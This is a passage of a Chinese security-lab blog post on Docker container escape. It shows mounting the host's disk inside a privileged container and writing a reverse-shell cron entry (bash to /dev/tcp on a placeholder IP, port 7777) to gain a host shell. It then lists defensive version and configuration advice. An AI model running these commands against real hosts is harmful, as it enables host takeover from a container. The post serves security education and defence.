美创安全实验室 | Docker逃逸原理

美创科技
关注


同理,新建一个目录/test2,将/dev/sda3挂载到新建的目录下,并查看test2目录下的内容,发现可以访问宿主机上/目录下的内容了

image.png


在计划任务里写入一个反弹shell:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root

image.png


在Docker上开启netcat监听7777端口,成功接收到宿主主机的Shell,实现Docker逃逸。

image.png


Docker逃逸防御

更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736。

runc版本 >1.0-rc6

k8s 集群版本>1.12

Linux内核版本>=2.6.22——CVE-2016-5195(脏牛)

Linux内核版本>=4.14——CVE-2017–1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险。

不建议以root权限运行Docker服务。

不建议以privileged(特权模式)启动Docker。

不建议将宿主机目录挂载至容器目录。

不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险。

美创科技聚焦数据安全,围绕数据安全、灾难备份、数据管理、智能运维等多方面挖掘和铸造数据价值,凭借卓越的产品技术和服务赢得了众多行业的认可和用户口碑!

声明: 本文由入驻OFweek维科号的作者撰写,观点仅代表作者本人,不代表OFweek立场。如有侵权或其他问题,请联系举报。
侵权投诉

下载OFweek,一手掌握高科技全行业资讯

还不是OFweek会员,马上注册
打开app,查看更多精彩资讯 >
  • 长按识别二维码
  • 进入OFweek阅读全文
长按图片进行保存